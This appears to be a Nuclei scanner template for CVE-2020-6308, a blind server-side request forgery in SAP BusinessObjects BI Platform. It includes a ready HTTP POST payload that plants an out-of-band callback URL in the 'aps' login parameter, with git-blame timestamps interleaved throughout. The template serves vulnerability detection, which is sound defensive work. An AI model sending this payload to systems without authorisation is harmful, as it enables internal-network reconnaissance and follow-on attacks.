2021-06-02 06:09:27 +00:00
id : CVE-2020-6308
info :
2023-04-04 19:51:42 +00:00
name : SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
2021-06-02 06:09:27 +00:00
author : madrobot
severity : medium
2022-10-19 02:13:15 +00:00
description : |
2023-04-04 19:51:42 +00:00
SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the relevant security patches provided by SAP to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/InitRoot/CVE-2020-6308-PoC
2022-05-17 09:18:12 +00:00
- https://launchpad.support.sap.com/#/notes/2943844
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
2023-04-04 19:51:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-6308
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-6308
cwe-id : CWE-918
2023-07-11 19:49:27 +00:00
epss-score : 0.00306
2023-10-30 20:55:37 +00:00
epss-percentile : 0.66464
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : sap
product : businessobjects_business_intelligence_platform
tags : cve,cve2020,sap,ssrf,oast,unauth
2021-06-02 06:09:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-10-19 02:13:15 +00:00
- raw :
2022-10-28 13:45:54 +00:00
- |
2022-10-19 02:13:15 +00:00
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
2021-06-02 06:09:27 +00:00
2022-10-19 02:13:15 +00:00
matchers-condition : and
2021-06-02 06:09:27 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
2022-10-19 02:13:15 +00:00
2022-10-19 17:00:59 +00:00
- type : word
part : location
2022-10-28 13:50:08 +00:00
words :
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
2023-10-31 09:39:52 +00:00
# digest: 490a0046304402206ad73447dcd190a31da32216ebf94ff0b052bc06daf1df0b081dff52951f9b4f02206d8d1197bbbdd2b8ca0345b506ef9980731f870ae5f3d56ebce5b415ad517953:922c64590222798bb761d5b6d8e72950